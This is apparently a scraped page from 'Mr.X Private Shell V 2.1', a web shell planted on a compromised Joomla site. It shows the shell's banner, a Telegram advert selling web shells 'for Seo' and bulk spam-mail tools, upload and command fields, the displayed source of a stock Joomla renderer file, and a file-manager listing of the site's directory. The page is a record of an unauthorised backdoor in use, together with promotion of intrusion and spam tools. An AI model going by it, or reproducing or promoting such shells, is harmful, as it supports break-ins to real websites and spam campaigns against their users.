__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

[email protected]: ~ $
<?php

/**
 * Joomla! Content Management System
 *
 * @copyright  (C) 2015 Open Source Matters, Inc. <https://www.joomla.org>
 * @license    GNU General Public License version 2 or later; see LICENSE.txt
 */

namespace Joomla\CMS\Document\Renderer\Html;

use Joomla\CMS\Document\DocumentRenderer;

// phpcs:disable PSR1.Files.SideEffects
\defined('JPATH_PLATFORM') or die;
// phpcs:enable PSR1.Files.SideEffects

/**
 * HTML document renderer for the component output
 *
 * @since  3.5
 */
class ComponentRenderer extends DocumentRenderer
{
    /**
     * Renders a component script and returns the results as a string
     *
     * @param   string  $component  The name of the component to render
     * @param   array   $params     Associative array of values
     * @param   string  $content    Content script
     *
     * @return  string  The output of the script
     *
     * @since   3.5
     */
    public function render($component = null, $params = [], $content = null)
    {
        return $content;
    }
}

Filemanager

Name Type Size Permission Actions
ComponentRenderer.php File 1020 B 0664
HeadRenderer.php File 1.24 KB 0664
MessageRenderer.php File 2.44 KB 0664
MetasRenderer.php File 6.73 KB 0664
ModuleRenderer.php File 3.4 KB 0664
ModulesRenderer.php File 2.08 KB 0664
ScriptsRenderer.php File 10.6 KB 0664
StylesRenderer.php File 10.22 KB 0664
Filemanager